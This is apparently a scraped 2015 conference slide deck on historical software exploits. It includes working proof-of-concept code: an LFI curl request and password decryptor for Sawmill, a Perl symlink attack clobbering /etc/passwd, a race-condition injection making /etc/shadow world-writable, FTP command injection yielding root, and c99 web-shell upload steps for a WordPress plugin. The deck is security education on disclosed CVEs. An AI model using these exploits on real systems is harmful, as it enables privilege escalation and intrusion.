This document discusses various software exploits, both old and new. It begins with background on the author and terminology used. Several specific past exploits are described in detail, including vulnerabilities in IRIX Midikeys from 1999, Sawmill from 2000, and Solaris catman from 2000. Exploit code examples are provided. More recent exploits discussed include a race condition in Centrify from 2012, command injection in an FTP server from 2013, SQL injection in WordPress software from 2015, and remote file inclusion in another WordPress plugin from 2015. The document concludes by soliciting any questions.
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Fun with Exploits Old and New: Software Behavior and Exploitation
1. Fun with Exploits Old and New
How software is expected to behave, how it really behaves and how we can exploit it
Larry W. Cashdollar
11/13/2015
V1.9
2. Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 100+ Vulnerabilities discovered
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code
• This is my second time speaking in public
3. Terminology
• CVE – Common Vulnerabilities and Exposure
• Root shell – gaining access to administrative
user on Unix system
• Web shell – a web based shell used to access
the system via HTTP
• Vulnerability – A flaw in a piece of software
• PoC – Proof of Concept
4. What is this all about?
• Concepts
• Methodologies
• Mind set
• How can I break this?
• Think like a hacker
5. Why bother hacking stuff?
• Improves software security
• Improves stability
• It’s like solving a puzzle
• Can be a lot of fun
• Improves your skills
• And……..
13. Sawmill LFI & weak encryption CVE-
2000-0589 & 0588
• Log analysis server listens on port 8987
• LFI can read first line of any word readable file
• Admin password stored in local file
• Admin password encrypted with custom
algorithm
14. Exploiting CVE-2000-0589 & 0588
• $ curl
http://192.168.1.65:8987/sawmill?rfcf+%22/etc/sawmill/adminpwd.db%2
2+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
• Returns encrypted password Am@duZw
• Simple substitution cypher
• Wrote code to decrypt… for my palm pilot IIIxe
15.
16. PoC for CVE-2000-0589 & 0588
1. #include <stdio.h>
2.
3. char alpha ="abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:"{}|";
4. char *encode="=GeKMNQS~TfUVWXY[abcygimrs"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";
5.
6. int
7. main (int argc, char **argv)
8. {
9.
10. int x, y;
11. char cypher[128];
12.
13. strncpy (cypher, argv[1], 128);
14.
15. for (x = 0; x < strlen (cypher); x++) {
16.
17. for (y = 0; y < strlen (encode); y++)
18. if (cypher[x] == encode[y]){
19. printf ("%c", alpha[y]);
20. break;
21. }
22. }
23.
24. printf("n"+" could also be a space [ ]n");
25. }
• Decrypted password was ‘wookie’
• Access to modify administrative control panel
• Developer gave me a free license
17. Solaris catman file clobbering
vulnerability CVE-2000-0095
• Creates files in /tmp insecurely
• Uses guessable filenames
• Doesn’t check to see if file already exists
• Creates files in /tmp as /tmp/sman_PID
• We can guess next filename and symlink to
/etc/passwd
18. PoC
1. #!/usr/local/bin/perl -w
2. # http://vapid.dhs.org
3. $clobber = "/etc/passwd";
4. #file to clobber
5. $X=getpgrp();
6. $Xc=$X;
7. #Constant
8. $Y=$X+1000;
9. #Constant
10. while($X < $Y) {
11. print "Linking /tmp/sman_$X to $clobber :";
12. # Change $clobber to what you want to clobber.
13. if (symlink ($clobber, "/tmp/sman_$X")) {
14. print "Sucessn";
15. } else
16. {
17. print "failed, Busy system?n";
18. }
19. $X=$X+1;
20. }
21. #Watch /tmp and see if catman is executed in time.
22. while(1) {
23. $list = "/usr/bin/ls -l /tmp | grep sman|grep root |";
24. open (list,$list) or "die cant open ls...n";
25. while(<list>) {
26. @args = split "_",$_;
27. chop ($args[1]);
28. if ($args[1] >= $Xc && $args[1] <= $Y)
29. {
30. print "Looks like pid $args[1] is the winnern cleaning....n";
31. `/usr/bin/rm -f /tmp/sman*`;
32. exit(1);
33. }
34. }
35. }
21. Centrify CVE-2012-6348 /tmp race
condition local root
• Administrative control daemon for system
management
• Creates a file in /tmp as centrify.cmd.0
• Executes that file as shell script!
• Executes as root!
22. CVE-2012-6348 PoC
Wins race condition 50% of the time:
$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0;
done
After the system is refreshed via administrative control job:
$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
23. CVE-2012-6348 Better PoC
• Wins race condition 100% of the time
• Written in C
• Uses inotify() to detect file modification and
creation
• Too long to display here
24. Ftpd ruby gem command injection
CVE-2013-2512
• FTP server developed in ruby
• Code examination reveals remote command injection
208 def ls(ftp_path, option)
209 path = expand_ftp_path(ftp_path)
210 dirname = File.dirname(path)
211 filename = File.basename(path)
212 command = [
213 'ls',
214 option,
215 filename, <-- unsanitized user controlled input
216 '2>&1',
217 ].compact.join(' ')
218 if File.exists?(dirname) <- file has to exist to exec ls command
219 list = Dir.chdir(dirname) do
220 `{command}` <-- passed to shell here
25. CVE-2013-2512 PoC
$ ftp localhost
Connected to localhost.
220 ftpd
Name (localhost:root): anonymous
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
* I already created the filename foobar by uploading a file
ftp> ls foobar;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
28. wp-powerplaygallery vulnerable RFI
Code CVE-2015-5681
50 $targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder';
51 $cleanupTargetDir = true; // Remove old files
52 $maxFileAge = 5 * 3600; // Temp file age in seconds
53
54 // Create target dir
55 if (!file_exists($targetDir)) {
56 @mkdir($targetDir);
57 }
.
148: // Read binary input stream and append it to temp file
149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."},
"id" : "id"}');
151: }
.
158: while ($buff = fread($in, 4096)) {
159: fwrite($out, $buff);
160: }
29. RFI Exploit Requirements
• POST request
• Variable albumid must point at existing album
in database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains payload with local full
path
• name variable contains our filename